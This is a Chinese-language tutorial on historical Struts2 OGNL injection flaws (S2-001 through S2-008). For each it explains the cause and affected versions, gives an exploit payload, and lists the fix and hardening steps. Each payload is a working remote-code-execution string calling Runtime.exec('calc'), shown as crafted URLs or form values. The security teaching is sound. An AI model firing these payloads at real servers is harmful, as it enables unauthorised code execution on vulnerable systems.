Struts2历史高危漏洞分析系列（一）教学文档

一、Struts2框架概述

Struts2是一个基于MVC设计模式的Java EE Web应用程序框架，其核心特点包括：

• 拦截器机制：通过拦截器栈处理请求
• OGNL表达式：强大的表达式语言用于数据访问和操作
• 值栈(ValueStack)：存储动作对象和上下文数据
• 标签库：简化JSP页面开发

二、漏洞分析方法论

分析Struts2漏洞的通用方法：

1. 确定请求处理流程中的关键组件
2. 识别参数传递和数据绑定机制
3. 分析OGNL表达式的执行过程
4. 检查安全防护机制的缺失点

三、S2-001漏洞分析（CVE-2007-4556）

漏洞原理

• 漏洞类型：OGNL表达式注入
• 影响版本：Struts 2.0.0 - 2.0.11
• 触发条件：表单验证失败时错误处理不当

技术细节

1. 当表单验证失败时，Struts2会将用户输入重新填充到表单中
2. 填充过程使用%{...}语法解析OGNL表达式
3. 攻击者可构造恶意OGNL表达式在服务器端执行

漏洞利用示例

<s:textfield name="username" value="%{#a=@java.lang.Runtime@getRuntime().exec('calc')}"/>

修复方案

1. 升级到Struts 2.0.12
2. 修复关键点：在重新填充表单值时对OGNL表达式进行严格过滤

四、S2-003漏洞分析（CVE-2008-6504）

漏洞原理

• 漏洞类型：参数名OGNL注入
• 影响版本：Struts 2.0.0 - 2.0.11.2
• 触发条件：参数名中包含OGNL表达式

技术细节

1. Struts2将HTTP请求参数名直接作为OGNL表达式解析
2. 攻击者可通过构造特殊参数名执行任意代码
3. 利用UTF-8编码绕过部分过滤机制

漏洞利用示例

http://target/foo.action?(%27%5cu0023_memberAccess.allowStaticMethodAccess%27)(a)=true&(b)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(%5cu0023c))&(%5cu0023c)((%27%5cu0023mycmd%5cu003d%5c%27calc%5c%27%27))&(d)((%5cu0023myret%5cu003d@java.lang.Runtime@getRuntime().exec(%5cu0023mycmd)))

修复方案

1. 升级到Struts 2.0.12
2. 修复关键点：严格限制参数名的解析，禁止在参数名中执行OGNL表达式

五、S2-005漏洞分析

漏洞原理

• 漏洞类型：参数值OGNL注入
• 影响版本：Struts 2.0.0 - 2.1.8.1
• 触发条件：利用S2-003修复不完整导致的二次漏洞

技术细节

1. S2-003修复引入了安全配置可被绕过
2. 通过构造特殊参数值执行OGNL表达式
3. 利用\u0023绕过#字符过滤

漏洞利用示例

http://target/foo.action?message=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@java.lang.Runtime@getRuntime%28%29.exec%28%22calc%22%29%29

修复方案

1. 升级到Struts 2.2.1
2. 修复关键点：全面加强OGNL表达式沙箱，限制静态方法访问

六、S2-007漏洞分析

漏洞原理

• 漏洞类型：类型转换错误导致的OGNL注入
• 影响版本：Struts 2.0.0 - 2.2.3
• 触发条件：表单字段类型转换失败时

技术细节

1. 当类型转换失败时，错误消息中包含用户输入
2. 错误消息通过OGNL表达式评估
3. 攻击者可构造恶意输入触发OGNL表达式执行

漏洞利用示例

<s:textfield name="age" value="%{'123' + (#_memberAccess.allowStaticMethodAccess=true,@java.lang.Runtime@getRuntime().exec('calc'))}"/>

修复方案

1. 升级到Struts 2.2.3.1
2. 修复关键点：在类型转换错误处理时严格过滤OGNL表达式

七、S2-008漏洞分析

漏洞原理

• 漏洞类型：多重机制绕过导致的RCE
• 影响版本：Struts 2.0.0 - 2.3.1
• 触发条件：利用调试模式和Cookie拦截器

技术细节

1. 调试模式暴露危险功能
2. Cookie拦截器处理不当导致OGNL注入
3. 结合多个小问题形成完整攻击链

漏洞利用示例

http://target/devmode.action?debug=command&expression=%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@java.lang.Runtime@getRuntime%28%29.exec%28%22calc%22%29

修复方案

1. 升级到Struts 2.3.1.1
2. 修复关键点：禁用生产环境中的调试模式，加强Cookie拦截器安全性

八、防御措施总结

1. 及时升级：保持Struts2框架最新版本
2. 禁用OGNL特性：在struts.xml中配置：

   <constant name="struts.ognl.allowStaticMethodAccess" value="false"/>
   

3. 输入验证：对所有用户输入进行严格过滤
4. 安全配置：
   • 禁用动态方法调用
   • 禁用调试模式
   • 限制上传文件类型
5. 沙箱加固：增强OGNL表达式执行环境的安全性

九、学习价值

1. 框架安全：理解MVC框架的安全设计要点
2. 漏洞模式：学习表达式注入类漏洞的通用模式
3. 防御思想：掌握多层防御的安全设计理念
4. 审计方法：培养对复杂框架的安全审计能力

通过对这些历史漏洞的分析，可以深入理解Web框架安全的关键问题，为分析和防御其他类似框架的漏洞奠定基础。